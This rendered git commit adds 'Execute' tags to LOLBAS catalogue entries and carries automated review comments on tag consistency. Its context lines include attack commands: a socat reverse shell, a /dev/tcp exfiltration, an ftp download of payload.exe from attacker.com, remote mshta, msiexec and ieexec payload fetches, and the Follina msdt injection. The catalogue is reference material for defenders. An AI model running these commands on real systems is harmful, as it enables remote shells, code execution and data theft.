Adding Execute tags to most LOLBas (#405)

This commit is contained in:
hegusung
2024-12-29 18:31:01 +01:00
committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
129 changed files with 520 additions and 59 deletions

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
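Review bot: the tag vocabulary for .NET execution is not uniform across this commit: `- Execute: .NetObjects` here (and on the Eventvwr deserialization entry), `- Execute: DLL (.NET)` / `- Execute: EXE (.NET)` on InstallUtil, Regasm, Regsvcs and ieexec, and `- Execute: CSharp` / `- Execute: Csharp` / `- Execute: VB.Net` on the compiler binaries. Anyone filtering LOLBAS entries by tag will miss rows unless each value is spelled exactly one way, so the allowed Execute values should be listed once in the repo docs and the values in this change normalised against that list before merge.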

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Local Admin
MitreID: T1053.002
OperatingSystem: Windows 7 or older
Tags:
- Execute: CMD
Full_Path:
- Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe

View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +21,8 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
- Execute: INF
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
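Review bot: both hunks in this file replace the existing `- Input: INF` line with `- Execute: INF` instead of adding the Execute tag beside it, so the Input category disappears from these entries; the same happens to `- Input: Custom Format` in the InstallUtil, Regasm and Regsvcs hunks below, and the commit message only speaks of adding Execute tags. If the Input category is being retired, say so in the message and check no other files still carry it; otherwise keep both tags, since the INF here is both the input format and the thing that gets executed.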

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\conhost.exe
Detection:
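Review bot: the `- Execute: CMD` added in this hunk sits under the `conhost.exe --headless calc.exe` entry, but what conhost launches there is an executable; the comparable entries in this commit (`explorer.exe C:\Windows\System32\notepad.exe`, `HH.exe c:\windows\system32\calc.exe`) get `- Execute: EXE`. Use EXE here unless CMD is meant to cover any command line, in which case the difference between the two values needs a written definition so they are applied consistently.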

View File

@@ -13,6 +13,15 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
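Review bot: by the hunk counts (-13,6 +13,15) nine lines are inserted, which is a complete new command entry (`control.exe c:\windows\tasks\evil.cpl` with its own Category, Privileges, MitreID and OperatingSystem) rather than a tag line, and the commit message does not mention adding entries. Check that it does not duplicate an existing entry in this file, and fix the unbalanced parenthesis in its Description, which reads "A CPL is a DLL file with CPlApplet export function)" with no opening bracket.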

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe
Detection:

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: ClickOnce
- Execute: Remote
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1003.003
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows server
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe

View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: DLL
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe

View File

@@ -46,7 +46,6 @@ Commands:
Privileges: Admin
MitreID: T1003.003
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
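Review bot: this hunk removes a line (-46,7 +46,6) instead of adding one, and the rendered view does not show what was dropped. If it was an empty `Tags:` key that is fine, but if an existing tag was removed it belongs in the commit message rather than buried in a change described as adding tags.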

View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe

View File

@@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\fsutil.exe
- Path: C:\Windows\SysWOW64\fsutil.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
@@ -18,6 +21,20 @@ Commands:
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CHM
- Execute: Remote
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
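Review bot: the count (-18,6 +21,20) shows fourteen added lines: besides `- Execute: EXE` / `- Application: GUI` for the calc.exe entry, a complete new command entry (`HH.exe http://some.url/payload.chm`, tagged `CMD`, `CHM` and `Remote`) is introduced, which the commit message does not mention. For the new entry, `- Execute: CMD` is a loose fit: the Description already says the CHM is what is executed and that it can contain commands, so `CHM` plus `Remote` describes it precisely and CMD can go.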

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Internet Explorer\iediagcmd.exe
Detection:

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
@@ -18,6 +21,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

View File

@@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
@@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
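Review bot: jsc.exe compiles JScript.NET source into an assembly (the Description says so: Library.js in, Library.dll out) and does not run it, which is why the entries sit under T1127. Replacing `- Execute: WSH` with `- Execute: JScript` on both entries puts them next to Mshta's `JScript` entry, which does execute script. If the Execute namespace means "what this binary runs", a compile-oriented value would be less misleading; at minimum the tag should not suggest that jsc runs the script it is handed.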

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: VB.Net
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@@ -18,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@@ -25,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:
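Review bot: `- Execute: Csharp` in the first hunk of this file differs in case from `- Execute: CSharp` used on the MSBuild entries; pick one spelling. Also, the second and third entries here carry the identical command (`Microsoft.Workflow.Compiler.exe tests.txt results.txt`) and identical Description, and both now receive `- Execute: XOML`; since this change touches both, it is the right moment to merge them or state what distinguishes them.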

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: COM
- Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL
@@ -35,7 +39,7 @@ Commands:
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: XSL
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
@@ -43,6 +47,8 @@ Commands:
Privileges: User
MitreID: T1036
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\msconfig.exe
Code_Sample:

View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
@@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting
@@ -31,6 +33,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe

View File

@@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
- Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

View File

@@ -12,7 +12,8 @@ Commands:
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: HTA
- Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
@@ -20,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
@@ -27,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
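Review bot: the `vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))` entry (tagged in the previous hunk) and the `javascript:a=GetObject("script:https://webserver/payload.sct")` entry (tagged here) both pull their scriptlet from a remote URL, yet they get only `- Execute: VBScript` / `- Execute: JScript`, while `- Execute: Remote` appears only in the first hunk of this file. Elsewhere in this commit (Cmstp, Regsvr32, the msiexec http entry) the remote-URL variants carry Remote; apply the same rule here so the tag can be relied on for filtering.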
@@ -35,7 +40,7 @@ Commands:
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: WSH
- Execute: HTA
- Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
@@ -18,6 +20,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
@@ -27,6 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
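Review bot: `- Execute: Remote` is added to the entry whose command is `msiexec /y "C:\folder\evil.dll"`, a local path; calling DllRegisterServer on a local DLL is not remote execution. Remote belongs on the `msiexec /q /i http://192.168.100.3/tmp/cmd.png` entry (which already receives it in the previous hunk) and the TRANSFORMS entry later in this file; drop it here.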
@@ -36,6 +42,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
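Review bot: same issue as the previous hunk: `- Execute: Remote` lands on the `msiexec /z "C:\folder\evil.dll"` entry, whose only argument is a local path. The `/i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst"` entry that follows is the one that fetches remotely, and it is tagged correctly in the next hunk, so this line should be removed.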
@@ -43,6 +50,10 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: MST
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
@@ -20,6 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Execute: Remote
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
@@ -27,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: Pcwrun.exe /../../$(calc).exe
Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Proxy execution of binary
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\pcwrun.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1547
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\provlaunch.exe
Detection:

View File

@@ -5,15 +5,14 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
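Review bot: beyond the tag swap, this hunk rewords the Description (".DLL file" becomes ".Net DLL file") and drops `- Input: Custom Format`; neither is covered by the commit message "Adding Execute tags", so either split them out or mention them. While editing the wording, ".NET" matches the spelling used in the tag value `DLL (.NET)` on the same hunk better than ".Net".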
@@ -22,8 +21,7 @@ Commands:
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

View File

@@ -5,25 +5,23 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
